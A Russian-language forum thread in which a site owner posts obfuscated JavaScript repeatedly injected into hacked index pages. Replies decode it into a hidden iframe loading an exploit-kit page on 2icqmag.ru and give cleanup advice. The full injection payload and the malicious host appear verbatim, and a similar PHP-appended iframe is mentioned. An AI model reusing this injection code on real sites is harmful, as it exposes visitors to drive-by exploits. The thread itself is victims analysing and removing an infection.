Взломали сайт, в индексы вставили код Code: <script>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&43&7:&74&82&7e&72&78&3f&83&86&3g&86&81&75&6g&8:&76&84&3g&7:&7f&75&76&89&3f&81&79&81&33&31&88&7:&75&85&79&4e&33&41&33&31&79&76&7:&78&79&85&4e&33&41&33&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&4c&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script> Код удалил. На след день опять код появился. Сменил все пассы на админов и модеров. Удалил скрипт этот. Через день опять этот скрипт появился в индексах. Подскажите что это за скрипт, что в нем зашифровано? и как от него избавиться?
>как от него избавиться? проанализировать все скрипты на сервере и исправить баги. Неумеешь сам - нанимай профи.
в первую очеред смени все пассы на FTP , то что ты удаляешь этот код это все хрень , сам он туда не вставиться , верно ?! его кто то же прописывает , и вот этот кто то , имеет твой акк на твой ftp , кароче совет > с чистой машины , зайти и поменять все пароли на всех акках ! а уж потом чисти скрипты !
Декодированный код <iframe src="http://2icqmag.ru/upd_yes/index.php" width="0" height="0" style="display:none;"></iframe>= Это скрытый фрейм, в котором загружаеться "http://2icqmag.ru/upd_yes/index.php"
Прошел по ссылке 2icqmag.ru/upd_yes/index.php а там след. код: этих два скрипта возможно декриптовать? (чем-то квест напоминает) Зашел в след раз по этой ссылке м меня перенаправило на http://defaultpage.3fn.net/?htr=sexy-zone.ru marketing.3fn.net/ru/ - партнерка. Так понимаю в том коде ссылка на рекламу, которую для аккаунта sexy-zone.ru предоставляет партнерка.
твой фреем ссылается на связку сплоитов, а этот код какраз и выдает сплоит под твой браузер, кстате мне пытались pdf сплоит впарить))), если знать точные названия папок на этой ссылке то можно выжать от туда сплоиты... P.S. декодировал первую часть скрипта и вот что там было зашифровано: P.S. вторая половина скрипта закодирована: скрипт раскодирован полностью
человек сразу дал понять о чем речь идет, и то что если ты прошелся по ссылкам то ты должен был понимать о том куда ты идешь...
Вот такой вирус оставлен в некоторых php файлах после ?> что он означает? помимо того, что это iframe)
там закодирован фреем код который подключает сайт _analyse.cc в данном случае на том адресе прописан редирект на партнерку, а вообще за счет этого кода можно подключить выполнения произвольных сценариев на правленый на посетителей страници с этим кодом.